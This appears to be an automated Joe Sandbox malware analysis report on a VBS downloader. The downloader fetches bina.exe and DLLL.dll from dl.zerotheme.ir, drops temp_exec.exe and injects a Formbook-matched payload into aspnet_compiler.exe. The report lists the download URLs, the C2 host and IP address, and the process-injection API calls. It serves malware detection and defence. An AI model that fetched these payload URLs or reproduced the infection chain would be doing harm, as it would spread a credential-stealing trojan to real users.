Windows Analysis Report
QT2Q1292300924.vbs

AI detected suspicious sample

Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2136321349.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136079152.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 185.18.213.20:443 -> 192.168.2.5:49704 version: TLS 1.2

Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: temp_exec.exe, 00000002.00000002.2093264557.0000000003059000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2093264557.0000000003051000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2094437417.00000000063D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\PAPANKEMOUWO.pdbBSJB source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000000.2047235189.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, temp_exec.exe.0.dr
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000004.00000002.2136494432.0000000001320000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: temp_exec.exe, 00000002.00000002.2093264557.0000000003059000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2093264557.0000000003051000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2094437417.00000000063D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.2136494432.0000000001320000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\PAPANKEMOUWO.pdb source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000000.2047235189.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, temp_exec.exe.0.dr

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_014E3B28
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_014E493D
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_014E3B4C
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_014E3B64
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_014E3BB7
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_014E5244
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_014E4E75

Networking

Potential malicious VBS script found (has network functionality)

Source:

Initial file: fileStream.SaveToFile path, 2 ' Overwrite existing file

Source: global traffic	HTTP traffic detected: GET /kokorila/cgl-bin/bina.exe HTTP/1.1Host: dl.zerotheme.irConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /kokorila/cgl-bin/DLLL.dll HTTP/1.1Host: dl.zerotheme.ir

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 185.18.213.20:443

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /kokorila/cgl-bin/bina.exe HTTP/1.1Host: dl.zerotheme.irConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /kokorila/cgl-bin/DLLL.dll HTTP/1.1Host: dl.zerotheme.ir

Source: global traffic

DNS traffic detected: DNS query: dl.zerotheme.ir

Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: temp_exec.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: temp_exec.exe, 00000002.00000002.2093264557.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.zerotheme.ir
Source: temp_exec.exe, 00000002.00000002.2093264557.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.zerotheme.ird
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: temp_exec.exe, 00000002.00000002.2093264557.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wscript.exe, 00000000.00000003.2094663386.000001FB086CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039085494.000001FB0842F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039009216.000001FB06349000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097713684.000001FB08A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038332027.000001FB08426000.00000004.00000020.00020000.00000000.sdmp, temp_exec.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: temp_exec.exe, 00000002.00000002.2093264557.0000000002FAC000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2093264557.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2093264557.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.zerotheme.ir
Source: temp_exec.exe, 00000002.00000002.2093264557.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll
Source: temp_exec.exe, 00000002.00000002.2093264557.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/bina.exe
Source: temp_exec.exe, 00000002.00000002.2093264557.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2093264557.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/bina.exebhttps://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 185.18.213.20:443 -> 192.168.2.5:49704 version: TLS 1.2

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2136321349.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136079152.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2136321349.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2136079152.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0042BDA3 NtClose,	4_2_0042BDA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01392DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_01392C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013935C0 NtCreateMutant,LdrInitializeThunk,	4_2_013935C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01394340 NtSetContextThread,	4_2_01394340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01394650 NtSuspendThread,	4_2_01394650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392B60 NtClose,	4_2_01392B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392BA0 NtEnumerateValueKey,	4_2_01392BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392B80 NtQueryInformationFile,	4_2_01392B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392BF0 NtAllocateVirtualMemory,	4_2_01392BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392BE0 NtQueryValueKey,	4_2_01392BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392AB0 NtWaitForSingleObject,	4_2_01392AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392AF0 NtWriteFile,	4_2_01392AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392AD0 NtReadFile,	4_2_01392AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392D30 NtUnmapViewOfSection,	4_2_01392D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392D10 NtMapViewOfSection,	4_2_01392D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392D00 NtSetInformationFile,	4_2_01392D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392DB0 NtEnumerateKey,	4_2_01392DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392DD0 NtDelayExecution,	4_2_01392DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392C00 NtQueryInformationProcess,	4_2_01392C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392C60 NtCreateKey,	4_2_01392C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392CA0 NtQueryInformationToken,	4_2_01392CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392CF0 NtOpenProcess,	4_2_01392CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392CC0 NtQueryVirtualMemory,	4_2_01392CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392F30 NtCreateSection,	4_2_01392F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392F60 NtCreateProcessEx,	4_2_01392F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392FB0 NtResumeThread,	4_2_01392FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392FA0 NtQuerySection,	4_2_01392FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392F90 NtProtectVirtualMemory,	4_2_01392F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392FE0 NtCreateFile,	4_2_01392FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392E30 NtWriteVirtualMemory,	4_2_01392E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392EA0 NtAdjustPrivilegesToken,	4_2_01392EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392E80 NtReadVirtualMemory,	4_2_01392E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01392EE0 NtQueueApcThread,	4_2_01392EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01393010 NtOpenDirectoryObject,	4_2_01393010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01393090 NtSetValueKey,	4_2_01393090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013939B0 NtGetContextThread,	4_2_013939B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01393D10 NtOpenProcessToken,	4_2_01393D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01393D70 NtOpenThread,	4_2_01393D70

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E83E9	2_2_014E83E9
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E8CBA	2_2_014E8CBA
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E3F30	2_2_014E3F30
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E27B8	2_2_014E27B8
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E2048	2_2_014E2048
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E2038	2_2_014E2038
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 2_2_014E0A78	2_2_014E0A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00401000	4_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0040F803	4_2_0040F803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_004160B3	4_2_004160B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00401260	4_2_00401260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0040FA23	4_2_0040FA23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00402ADD	4_2_00402ADD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00402AE0	4_2_00402AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0040DAA3	4_2_0040DAA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00402340	4_2_00402340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0042E333	4_2_0042E333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00402334	4_2_00402334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00402E70	4_2_00402E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0040F7FA	4_2_0040F7FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013FA118	4_2_013FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350100	4_2_01350100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E8158	4_2_013E8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_014181CC	4_2_014181CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_014201AA	4_2_014201AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141A352	4_2_0141A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_014203E6	4_2_014203E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136E3F0	4_2_0136E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E02C0	4_2_013E02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360535	4_2_01360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01420591	4_2_01420591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01412446	4_2_01412446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0140E4F6	4_2_0140E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360770	4_2_01360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01384750	4_2_01384750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135C7C0	4_2_0135C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137C6E0	4_2_0137C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01376962	4_2_01376962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013629A0	4_2_013629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0142A9A6	4_2_0142A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01362840	4_2_01362840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136A840	4_2_0136A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013468B8	4_2_013468B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E8F0	4_2_0138E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0141AB40	4_2_0141AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01416BD7	4_2_01416BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135EA80	4_2_0135EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136AD00	4_2_0136AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01378DBF	4_2_01378DBF
